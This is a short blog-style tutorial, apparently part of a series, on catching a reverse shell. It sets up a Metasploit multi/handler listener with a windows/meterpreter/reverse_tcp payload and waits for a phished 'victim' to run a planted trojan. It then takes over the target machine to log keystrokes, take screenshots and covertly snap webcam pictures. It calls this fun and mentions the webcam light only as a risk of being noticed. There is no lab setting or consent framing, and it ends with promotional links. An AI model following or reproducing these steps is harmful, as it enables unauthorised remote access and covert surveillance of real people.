A quick preview of what’s to come:
- Starting a meterpreter session – we will start a meterpreter session that will give us remote access to the victim’s computer once the victim activates the trojan.
- Using meterpreter to snoop around the victim’s computer – once the victim clicks on the trojan, meterpreter will activate and give us access to the victim’s files and various systems.
Step 1: Start a meterpreter session
Open meterpreter from the applications menu and run it.
You should then see a menu open that looks something like this.
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
If you forgot how to find your ip address from the previous article, simply type in ifconfig on a new terminal.
set lhost [your IP address] set lport 4444
After all of this is done, type “run” and the session will start. The session will continue to wait until the trojan file is executed.
Step 2: Wait for the phish
You will stay on this screen until the target runs the file, and once they do, your screen will change to this:
From here, you can type in “help” to see a list of commands.
There are a ton of attractive commands. You can log the target’s key inputs, take screenshots, snap pictures from their webcam, and so much more. Feel free to explore to your heart’s content.
Example: Type: webcam_snap to take a picture through the target computer’s webcam.
Note: the computer’s webcam light will turn on. For a simple picture, this might not be too big a deal, as it will only be for a second and the target might not notice, but it should be noted.
A picture of whatever the webcam sees will be sent to your machine.
To exit the meterpreter session, simply type “exit” to end the session.
This is only one of the many amazing things you can do with meterpreter and Metasploit in general. If you want to continue playing around, you can buy a USB with Kali Linux at this website here.
- We started a meterpreter session and waited for the victim to run the trojan that we have already planted on his computer.
- Once the victim ran the trojan, we used meterpreter to look around on the victim’s computer and take a webcam screenshot.
Metasploit is a powerful and very fun tool to use once you get the hang of it. You can do so many more things with metasploit besides taking a screenshot, and if you want to play around with metasploit by yourself, you can buy a Kali Linux live USB right here.